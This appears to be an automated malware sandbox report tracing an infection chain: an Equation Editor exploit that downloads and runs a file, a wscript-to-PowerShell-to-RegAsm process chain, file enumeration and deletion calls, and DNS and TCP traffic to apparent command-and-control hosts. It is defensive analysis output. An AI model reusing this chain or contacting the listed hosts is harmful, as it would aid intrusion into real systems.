                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0044E879 FindFirstFileExA,14_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040783C FindFirstFileW,FindNextFileW,14_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407C97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                Software Vulnerabilities

                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0033209D ShellExecuteW,ExitProcess,9_2_0033209D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00331FBA LoadLibraryW,9_2_00331FBA
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00332088 ShellExecuteW,ExitProcess,9_2_00332088
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00331EDD ExitProcess,9_2_00331EDD
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003320C2 ExitProcess,9_2_003320C2
                Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global traffic DNS query: name: zhort.de
                Source: global traffic DNS query: name: ia803104.us.archive.org
                Source: global traffic DNS query: name: 2024remcmon.duckdns.org
                Source: global traffic DNS query: name: geoplugin.net
                Source: global traffic TCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global traffic TCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global traffic TCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global traffic TCP traffic: 192.168.2.22:49172 -> 107.172.31.21:80
                Source: global traffic TCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global traffic TCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global traffic TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global traffic TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global traffic TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
